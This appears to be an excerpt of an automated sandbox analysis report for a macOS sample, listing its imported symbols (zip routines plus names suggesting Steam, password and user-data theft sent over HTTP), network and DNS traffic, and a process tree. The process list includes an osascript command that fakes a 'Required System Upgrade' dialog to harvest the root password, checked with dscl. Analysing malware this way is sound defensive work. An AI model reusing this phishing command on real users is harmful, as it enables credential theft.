      _mz_zip_writer_validate_archive_name
      _mz_zip_writer_write_zeros
      _mz_zip_zero_struct
      _names
      _open
      _opendir
      _parseFF
      _parse_steam
      _pclose
      _pikfolder
      _plugin_paths
      _popen
      _pwd_getted
      _read
      _readdir
      _readwrite
      _realloc
      _remove
      _s_tdefl_large_dist_extra
      _s_tdefl_large_dist_sym
      _s_tdefl_len_extra
      _s_tdefl_len_sym
      _s_tdefl_num_probes
      _s_tdefl_packed_code_size_syms_swizzle
      _s_tdefl_small_dist_extra
      _s_tdefl_small_dist_sym
      _send
      _send_data_via_http
      _snprintf
      _socket
      _stat
      _strlen
      _tcc
      _tdefl_calculate_minimum_redundancy
      _tdefl_compress
      _tdefl_compress_block
      _tdefl_compress_buffer
      _tdefl_compress_lz_codes
      _tdefl_compress_mem_to_heap
      _tdefl_compress_mem_to_mem
      _tdefl_compress_mem_to_output
      _tdefl_compress_normal
      _tdefl_compressor_alloc
      _tdefl_compressor_free
      _tdefl_create_comp_flags_from_zip_params
      _tdefl_flush_block
      _tdefl_flush_output_buffer
      _tdefl_get_adler32
      _tdefl_get_prev_return_status
      _tdefl_huffman_enforce_max_code_size
      _tdefl_init
      _tdefl_optimize_huffman_table
      _tdefl_output_buffer_putter
      _tdefl_radix_sort_syms
      _tdefl_start_dynamic_block
      _tdefl_start_static_block
      _tdefl_write_image_to_png_file_in_memory
      _tdefl_write_image_to_png_file_in_memory_ex
      _tdefl_write_image_to_png_file_in_memory_ex.chans
      _tdefl_write_image_to_png_file_in_memory_ex.s_tdefl_png_num_probes
      _time
      _tinfl_decompress
      _tinfl_decompress.s_dist_base
      _tinfl_decompress.s_dist_extra
      _tinfl_decompress.s_length_base
      _tinfl_decompress.s_length_dezigzag
      _tinfl_decompress.s_length_extra
      _tinfl_decompress.s_min_table_sizes
      _tinfl_decompress_mem_to_callback
      _tinfl_decompress_mem_to_heap
      _tinfl_decompress_mem_to_mem
      _tinfl_decompressor_alloc
      _tinfl_decompressor_free
      _userinfo
      _utime
      _writeall
      _writetext
      _zip
      dyld_stub_binder

      ___assert_rtn
      ___stack_chk_fail
      _bzero
      _close
      _closedir
      _connect
      _fclose
      _fflush
      _fopen
      _fread
      _free
      _freopen
      _fseeko
      _ftello
      _fwrite
      _getpagesize
      _inet_addr
      _localtime
      _malloc
      _memcmp
      _memcpy
      _memset
      _mktime
      _mmap
      _open
      _opendir
      _pclose
      _popen
      _read
      _readdir
      _realloc
      _remove
      _send
      _snprintf
      _socket
      _stat
      _strlen
      _time
      _utime

      Timestamp | Source Port | Dest Port | Source IP | Dest IP
      Oct 10, 2023 20:29:40.968908072 CEST | 49373 | 80 | 192.168.11.11 | 17.253.83.202
      Oct 10, 2023 20:29:41.134790897 CEST | 80 | 49373 | 17.253.83.202 | 192.168.11.11
      Oct 10, 2023 20:29:41.135526896 CEST | 49373 | 80 | 192.168.11.11 | 17.253.83.202
      Oct 10, 2023 20:30:10.970803022 CEST | 49374 | 80 | 192.168.11.11 | 23.47.151.53
      Oct 10, 2023 20:30:11.137202978 CEST | 80 | 49374 | 23.47.151.53 | 192.168.11.11
      Oct 10, 2023 20:30:11.137953043 CEST | 49374 | 80 | 192.168.11.11 | 23.47.151.53
      Oct 10, 2023 20:32:00.238451004 CEST | 49398 | 443 | 192.168.11.11 | 100.22.10.168
      Oct 10, 2023 20:32:00.238574028 CEST | 443 | 49398 | 100.22.10.168 | 192.168.11.11
      Oct 10, 2023 20:32:00.239126921 CEST | 49398 | 443 | 192.168.11.11 | 100.22.10.168
      Oct 10, 2023 20:32:00.239928007 CEST | 49398 | 443 | 192.168.11.11 | 100.22.10.168
      Oct 10, 2023 20:32:00.240001917 CEST | 443 | 49398 | 100.22.10.168 | 192.168.11.11
      Oct 10, 2023 20:32:00.667278051 CEST | 443 | 49398 | 100.22.10.168 | 192.168.11.11
      Oct 10, 2023 20:32:00.669224977 CEST | 49398 | 443 | 192.168.11.11 | 100.22.10.168
      Oct 10, 2023 20:32:00.669430971 CEST | 49398 | 443 | 192.168.11.11 | 100.22.10.168
      Oct 10, 2023 20:32:00.701082945 CEST | 49398 | 443 | 192.168.11.11 | 100.22.10.168
      Oct 10, 2023 20:32:00.701365948 CEST | 443 | 49398 | 100.22.10.168 | 192.168.11.11
      Oct 10, 2023 20:32:00.701982975 CEST | 443 | 49398 | 100.22.10.168 | 192.168.11.11
      Oct 10, 2023 20:32:00.702116966 CEST | 49398 | 443 | 192.168.11.11 | 100.22.10.168
      Oct 10, 2023 20:32:00.702990055 CEST | 49398 | 443 | 192.168.11.11 | 100.22.10.168
      Oct 10, 2023 20:32:00.712598085 CEST | 49400 | 443 | 192.168.11.11 | 100.22.10.168
      Oct 10, 2023 20:32:00.712718964 CEST | 443 | 49400 | 100.22.10.168 | 192.168.11.11
      Oct 10, 2023 20:32:00.713449955 CEST | 49400 | 443 | 192.168.11.11 | 100.22.10.168
      Oct 10, 2023 20:32:00.714247942 CEST | 49400 | 443 | 192.168.11.11 | 100.22.10.168
      Oct 10, 2023 20:32:00.714308023 CEST | 443 | 49400 | 100.22.10.168 | 192.168.11.11
      Oct 10, 2023 20:32:01.126565933 CEST | 443 | 49400 | 100.22.10.168 | 192.168.11.11
      Oct 10, 2023 20:32:01.128273010 CEST | 49400 | 443 | 192.168.11.11 | 100.22.10.168
      Oct 10, 2023 20:32:01.128703117 CEST | 49400 | 443 | 192.168.11.11 | 100.22.10.168
      Oct 10, 2023 20:32:01.142936945 CEST | 49400 | 443 | 192.168.11.11 | 100.22.10.168
      Oct 10, 2023 20:32:01.143170118 CEST | 443 | 49400 | 100.22.10.168 | 192.168.11.11
      Oct 10, 2023 20:32:01.143783092 CEST | 49400 | 443 | 192.168.11.11 | 100.22.10.168

      Timestamp | Source Port | Dest Port | Source IP | Dest IP
      Oct 10, 2023 20:29:38.499535084 CEST | 53 | 52126 | 1.1.1.1 | 192.168.11.11
      Oct 10, 2023 20:30:42.503539085 CEST | 137 | 137 | 192.168.11.11 | 192.168.11.255
      Oct 10, 2023 20:30:42.503699064 CEST | 137 | 137 | 192.168.11.11 | 192.168.11.255
      Oct 10, 2023 20:30:42.504388094 CEST | 137 | 137 | 192.168.11.11 | 192.168.11.255
      Oct 10, 2023 20:31:35.737001896 CEST | 137 | 137 | 192.168.11.11 | 192.168.11.255
      Oct 10, 2023 20:31:35.737289906 CEST | 137 | 137 | 192.168.11.11 | 192.168.11.255
      Oct 10, 2023 20:31:35.737848043 CEST | 137 | 137 | 192.168.11.11 | 192.168.11.255
      Oct 10, 2023 20:31:35.738249063 CEST | 137 | 137 | 192.168.11.11 | 192.168.11.255
      Oct 10, 2023 20:31:35.738298893 CEST | 137 | 137 | 192.168.11.11 | 192.168.11.255
      Oct 10, 2023 20:31:36.486726046 CEST | 137 | 137 | 192.168.11.11 | 192.168.11.255
      Oct 10, 2023 20:31:36.487256050 CEST | 137 | 137 | 192.168.11.11 | 192.168.11.255
      Oct 10, 2023 20:31:36.487809896 CEST | 137 | 137 | 192.168.11.11 | 192.168.11.255
      Oct 10, 2023 20:31:37.235595942 CEST | 137 | 137 | 192.168.11.11 | 192.168.11.255
      Oct 10, 2023 20:31:37.235810041 CEST | 137 | 137 | 192.168.11.11 | 192.168.11.255

      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
      Oct 10, 2023 20:32:00.236066103 CEST | 1.1.1.1 | 192.168.11.11 | 0x4116 | No error (0) | pubingress-feedback-1a6fe9caff1148fe.elb.us-west-2.amazonaws.com |  | 100.22.10.168 | A (IP address) | IN (0x0001) | false
      Oct 10, 2023 20:32:00.236066103 CEST | 1.1.1.1 | 192.168.11.11 | 0x4116 | No error (0) | pubingress-feedback-1a6fe9caff1148fe.elb.us-west-2.amazonaws.com |  | 44.235.78.64 | A (IP address) | IN (0x0001) | false
      Oct 10, 2023 20:32:00.236066103 CEST | 1.1.1.1 | 192.168.11.11 | 0x4116 | No error (0) | pubingress-feedback-1a6fe9caff1148fe.elb.us-west-2.amazonaws.com |  | 44.232.224.125 | A (IP address) | IN (0x0001) | false

      System Behavior

      Start time (UTC): 18:29:18
      Start date (UTC): 10/10/2023
      Path: /Library/Frameworks/Mono.framework/Versions/4.4.2/bin/mono-sgen32
      Arguments: -
      File size: 3722408 bytes
      MD5 hash: 8910349f44a940d8d79318367855b236

      Start time (UTC): 18:29:18
      Start date (UTC): 10/10/2023
      Path: /Users/berri/Desktop/1rNsYj4HBT
      Arguments: /Users/berri/Desktop/1rNsYj4HBT
      File size: 442038 bytes
      MD5 hash: a1a7891c4b4cd308e31c2c62860c8581

      Start time (UTC): 18:29:18
      Start date (UTC): 10/10/2023
      Path: /bin/sh
      Arguments: -
      File size: 618512 bytes
      MD5 hash: 8aa60b22a5d30418a002b340989384dc

      Start time (UTC): 18:29:18
      Start date (UTC): 10/10/2023
      Path: /usr/bin/dscl
      Arguments: dscl . authonly root
      File size: 202560 bytes
      MD5 hash: 2072d2ac07a471913b06fed4b4bd55cf

      Start time (UTC): 18:29:18
      Start date (UTC): 10/10/2023
      Path: /bin/sh
      Arguments: -
      File size: 618512 bytes
      MD5 hash: 8aa60b22a5d30418a002b340989384dc

      Start time (UTC): 18:29:18
      Start date (UTC): 10/10/2023
      Path: /usr/bin/osascript
      Arguments: osascript -e display dialog 'Required System Upgrade. Please enter passphrase for root.' default answer '' with icon caution buttons {'Continue'} default button 'Continue' giving up after 150 with title 'Application wants to install helper' with hidden answer
      File size: 43136 bytes
      MD5 hash: 86c0eb9ab6768a4a8e723dcda40bc65a